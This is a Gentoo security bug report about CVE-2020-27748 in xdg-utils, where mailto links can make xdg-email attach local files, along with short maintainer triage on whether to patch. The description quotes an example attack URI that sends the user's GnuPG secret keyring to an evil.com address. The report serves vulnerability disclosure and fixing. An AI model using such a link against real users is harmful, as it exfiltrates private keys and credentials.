Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 756838 (CVE-2020-27748) - x11-misc/xdg-utils: Improper handling of mailto URI (CVE-2020-27748)
Summary: x11-misc/xdg-utils: Improper handling of mailto URI (CVE-2020-27748)
Status: IN_PROGRESS
Alias: CVE-2020-27748
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal normal (vote)
Assignee: Gentoo Security
URL: https://gitlab.freedesktop.org/xdg/xd...
Whiteboard: A4 [upstream/ebuild]
Keywords:
Depends on:
Blocks:
 
Reported: 2020-11-26 16:31 UTC by Sam James
Modified: 2020-11-27 01:42 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sam James archtester gentoo-dev Security 2020-11-26 16:31:40 UTC
A local file inclusion vulnerability was found in xdc-utils:
"xdg-email: remove attachment handling from mailto
This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg"
Comment 1 Sam James archtester gentoo-dev Security 2020-11-26 16:31:54 UTC
Please apply the linked patch.
Comment 2 Sam James archtester gentoo-dev Security 2020-11-26 16:32:49 UTC
(In reply to Sam James from comment #1)
> Please apply the linked patch.

https://gitlab.freedesktop.org/Mic92/xdg-utils/-/commit/1f199813e0eb0246f63b54e9e154970e609575af, if you feel it's suitable.

Upstream issue seems dead.
Comment 3 Mike Gilbert gentoo-dev 2020-11-27 01:42:11 UTC
So this only affects people who call xdg-email and have Thunderbird as their default mail client, and fail to notice that a file got attached to their message.

This seems pretty unlikely to actually happen to me. I think we should wait for a change to be merged upstream.